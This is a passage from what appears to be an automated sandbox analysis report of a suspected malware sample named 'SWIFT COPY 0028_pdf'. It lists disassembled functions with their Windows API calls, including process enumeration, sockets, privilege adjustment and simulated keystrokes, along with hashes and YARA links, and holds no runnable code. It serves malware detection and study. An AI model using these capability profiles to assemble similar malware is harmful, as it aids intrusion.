                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1605983538-0
                                                                                    • Opcode ID: dca603cff073cc3a04022ff7b59dea9a572aa36e13cbdd15ae7588eb1627e230
                                                                                    • Instruction ID: ee4779fc93b5ea126fcdaa594ab3b7b0c9db93efd493b86ee3ae6e5081bae4d6
                                                                                    • Opcode Fuzzy Hash: dca603cff073cc3a04022ff7b59dea9a572aa36e13cbdd15ae7588eb1627e230
                                                                                    • Instruction Fuzzy Hash: EC219271904218ABDB10ABA4CC89FEEBBBCAF49300F5004A5F546E3141EB759F85CFA1
                                                                                    Function 0097923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0097A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0097A84E
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00979296
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009792B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 4170576061-0
                                                                                    • Opcode ID: d8d2ff94c2d9c6914ae1b3282e161d145b491541ac85b3c4ef5adf6aba2b96f0
                                                                                    • Instruction ID: 18e292a798c9dd5d2395235f5b6e7d78b1d6d2292dfe915a83f2364a2214db21
                                                                                    • Opcode Fuzzy Hash: d8d2ff94c2d9c6914ae1b3282e161d145b491541ac85b3c4ef5adf6aba2b96f0
                                                                                    • Instruction Fuzzy Hash: 9F41A071600214AFDB14AB68C882F7EB7EDEF84724F148548F956AB3D2DB749D018B91
                                                                                    Function 0096EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0096EB8A
                                                                                    • _wcscmp.LIBCMT ref: 0096EBBA
                                                                                    • _wcscmp.LIBCMT ref: 0096EBCF
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0096EBE0
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0096EC0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2387731787-0
                                                                                    • Opcode ID: 88afae6e928ac657b792c2187d57172f2eba1cde6b553e914d3c6bd1181e8c59
                                                                                    • Instruction ID: 6a29cde146c29a5ad441d1cb7651a65871369099456584eeedeeacf137a92ec4
                                                                                    • Opcode Fuzzy Hash: 88afae6e928ac657b792c2187d57172f2eba1cde6b553e914d3c6bd1181e8c59
                                                                                    • Instruction Fuzzy Hash: F4419F396047029FCB08DF28C491A99B7E8FF89324F10455DF99A8B3A1DB35A945CF91
                                                                                    Function 00988111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                    • String ID:
                                                                                    • API String ID: 292994002-0
                                                                                    • Opcode ID: e8bd53fc78f7ff6b8c8b8c24c7edb00775d636228a1b275853a880c77f5097ba
                                                                                    • Instruction ID: ef0855e9ef772e9e7a6f5a2640ca0d5a4997e2238884f6d191c5567d87bcc7e7
                                                                                    • Opcode Fuzzy Hash: e8bd53fc78f7ff6b8c8b8c24c7edb00775d636228a1b275853a880c77f5097ba
                                                                                    • Instruction Fuzzy Hash: 4611BF317092146FE7217F26DC48F6FBB9CEF85760B450429F84AD7281CF34A90287A0
                                                                                    Function 00929B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                    • API String ID: 0-1546025612
                                                                                    • Opcode ID: 791261394e25be7968ce44e17023a6dce7af5736944966f47a4fcf67cdae6de8
                                                                                    • Instruction ID: f68aef3ef9ebf2c7a5c59424443731f0576be8c6a270a4dbd32657d4da9a698b
                                                                                    • Opcode Fuzzy Hash: 791261394e25be7968ce44e17023a6dce7af5736944966f47a4fcf67cdae6de8
                                                                                    • Instruction Fuzzy Hash: C492DFB1E0022ACBDF24CF58D8807FDB7B5BB55314F24859AE81AAB285D7349D81CF91
                                                                                    Function 0093E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0093E014,76230AE0,0093DEF1,009BDC38,?,?), ref: 0093E02C
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0093E03E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2574300362-192647395
                                                                                    • Opcode ID: 3bb43744054e4931513449e4580ca9d54ebf431669f13d087b34aee8cc7cfe6e
                                                                                    • Instruction ID: a0a2d9626cc73f65f6d694b2bad6d9c8b49355b0a04ce70a26c40bc9878c90f1
                                                                                    • Opcode Fuzzy Hash: 3bb43744054e4931513449e4580ca9d54ebf431669f13d087b34aee8cc7cfe6e
                                                                                    • Instruction Fuzzy Hash: 4AD0A93085C7129FC7394FA0ED0862377E8AF12304F18842AE882D2690EBB4C8808EA0
                                                                                    Function 009613CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009613DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen
                                                                                    • String ID: ($|
                                                                                    • API String ID: 1659193697-1631851259
                                                                                    • Opcode ID: 17bc9302789d551c218183983a205adf050a3f766cf188d81b9c1acb8b58013c
                                                                                    • Instruction ID: 1ccc5ff276c3e88348b51944c9896524a6fad74978692cc3e8787003924545bf
                                                                                    • Opcode Fuzzy Hash: 17bc9302789d551c218183983a205adf050a3f766cf188d81b9c1acb8b58013c
                                                                                    • Instruction Fuzzy Hash: 45321475A007059FC728CF69C490A6AB7F4FF48320B15C56EE59ADB3A2EB70E941CB44
                                                                                    Function 0093B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0093B22F
                                                                                      • Part of subcall function 0093B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0093B5A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Proc$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2749884682-0
                                                                                    • Opcode ID: 2353b8e2a4c8f2c5774acd3da7eaddc199fe2ffcab74669db53befecf2d01530
                                                                                    • Instruction ID: 4c52348ee839b70ca318d1243e4bda4427e0fb1bef1467a4affa1a72b3bdb7f4
                                                                                    • Opcode Fuzzy Hash: 2353b8e2a4c8f2c5774acd3da7eaddc199fe2ffcab74669db53befecf2d01530
                                                                                    • Instruction Fuzzy Hash: 3DA18B70518005BADF38AF2E8C99F7F3A5CEBA6750F104B19F612D6595DB289C00EB72
                                                                                    Function 00974EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009743BF,00000000), ref: 00974FA6
                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00974FD2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 599397726-0
                                                                                    • Opcode ID: d6c69f146c24ed03ca5697a2d9862e5f30bf851fb042b4342381103b9854f813
                                                                                    • Instruction ID: ac48876401af24ad84623b0e99d983da79a810a5fc74d637c2155be54e220ea0
                                                                                    • Opcode Fuzzy Hash: d6c69f146c24ed03ca5697a2d9862e5f30bf851fb042b4342381103b9854f813
                                                                                    • Instruction Fuzzy Hash: FE41A773604609FFEB119E94DC85FBF77BCEB80754F10802AF60DA6181E7B59E419690
                                                                                    Function 0096E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0096E20D
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0096E267
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0096E2B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1682464887-0
                                                                                    • Opcode ID: 833b6ca70c51fbf44b2e8131b52d48fa4e558f2143967a00a834f431fc7b8443
                                                                                    • Instruction ID: d6ecbd838aff78960978cfc9513a0f29014f91dd6339b0a455415598a81ef455
                                                                                    • Opcode Fuzzy Hash: 833b6ca70c51fbf44b2e8131b52d48fa4e558f2143967a00a834f431fc7b8443
                                                                                    • Instruction Fuzzy Hash: 3F213D75A10218EFCB00EFA5D895AADBBB8FF89310F0484AAE945A7251DB319905CB50
                                                                                    Function 0095B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093F4EA: std::exception::exception.LIBCMT ref: 0093F51E
                                                                                      • Part of subcall function 0093F4EA: __CxxThrowException@8.LIBCMT ref: 0093F533
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095B180
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0095B1AD
                                                                                    • GetLastError.KERNEL32 ref: 0095B1BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1922334811-0
                                                                                    • Opcode ID: 073fffe5bfdb51f93a1b2dddd1f5d0e1b5f65c9faffe225ab35822314fbbb899
                                                                                    • Instruction ID: 19201a1afe6afdf230ea961ee4f23b33fb412b0abcd038fe052580b943a122a7
                                                                                    • Opcode Fuzzy Hash: 073fffe5bfdb51f93a1b2dddd1f5d0e1b5f65c9faffe225ab35822314fbbb899
                                                                                    • Instruction Fuzzy Hash: CC11BFB2918605AFE718DF54DC95D2BB7ACEF44311B20852EF45697250DB70FC458B60
                                                                                    Function 00966685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009666AF
                                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009666EC
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009666F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 33631002-0
                                                                                    • Opcode ID: 9ec21f777d44bd2c10730ab0752a6b8ffbf2ac14e325eaff5bffaa77ff9b4ab6
                                                                                    • Instruction ID: e7b263fec26a5a5437fcb5370821665462c1f025ef2a5b366e73f98591c6a4ed
                                                                                    • Opcode Fuzzy Hash: 9ec21f777d44bd2c10730ab0752a6b8ffbf2ac14e325eaff5bffaa77ff9b4ab6
                                                                                    • Instruction Fuzzy Hash: 7111C8B1915228BFE7108BA8DC45FAF77BCEB05754F004555F901E7190C2749E0497E5
                                                                                    Function 009671FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00967223
                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0096723A
                                                                                    • FreeSid.ADVAPI32(?), ref: 0096724A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                    • String ID:
                                                                                    • API String ID: 3429775523-0
                                                                                    • Opcode ID: f6e56ea49350e5d5d9ef28f9cd927cd4a74ccdf84142f12e9c036be601ccd211
                                                                                    • Instruction ID: ae0dc9fcc85efc8c73fa83cb153975a35a1d7cc5a9f17463459e61b58faa7b42
                                                                                    • Opcode Fuzzy Hash: f6e56ea49350e5d5d9ef28f9cd927cd4a74ccdf84142f12e9c036be601ccd211
                                                                                    • Instruction Fuzzy Hash: 2DF06776A15218BFDF00DFF4CC89AEEBBBCFF08201F004869A602E2181E3709A049B50
                                                                                    Function 0096F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0096F599
                                                                                    • FindClose.KERNEL32(00000000), ref: 0096F5C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: ad08242cddd11fdacbaf2608fea7b9e1451c21af6ed3015aa7e3bc1d8d3a076d
                                                                                    • Instruction ID: 075891ab9c16100859da335d1a442dbcec8c578e3ea824018a4682429453e4f0
                                                                                    • Opcode Fuzzy Hash: ad08242cddd11fdacbaf2608fea7b9e1451c21af6ed3015aa7e3bc1d8d3a076d
                                                                                    • Instruction Fuzzy Hash: B411C4716042009FDB04EF28D845A2EB3E8FF89324F00895EF8A6D7291CB30BD008B81
                                                                                    Function 0096CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0097BE6A,?,?,00000000,?), ref: 0096CEA7
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0097BE6A,?,?,00000000,?), ref: 0096CEB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: 166745085ad34b467a353339bea19d1bc321316fe3692bea7269f252b6f161f6
                                                                                    • Instruction ID: 495f2bb58babde48affa7e9d10bc69273b12a8a912deb622a54d871190a1ceb7
                                                                                    • Opcode Fuzzy Hash: 166745085ad34b467a353339bea19d1bc321316fe3692bea7269f252b6f161f6
                                                                                    • Instruction Fuzzy Hash: 45F08C71514229ABDB20ABA4DC49FFA776DFF093A1F008165F91AD6181D6709A40CBA0
                                                                                    Function 0096411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00964153
                                                                                    • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00964166
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InputSendkeybd_event
                                                                                    • String ID:
                                                                                    • API String ID: 3536248340-0
                                                                                    • Opcode ID: d07e5028b795618cab8088f32daf27b512bf379b82166a47e3ba360be58b385c
                                                                                    • Instruction ID: 2bf9db68a814c5bc5829c6ea1fa5482611f2eaa9ed28cefb1498d567986f3dfe
                                                                                    • Opcode Fuzzy Hash: d07e5028b795618cab8088f32daf27b512bf379b82166a47e3ba360be58b385c
                                                                                    • Instruction Fuzzy Hash: E9F0677081824DAFDB058FA0C805BBE7BB4EF11305F00840AF966AA192D77986129FA0
                                                                                    Function 0095AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
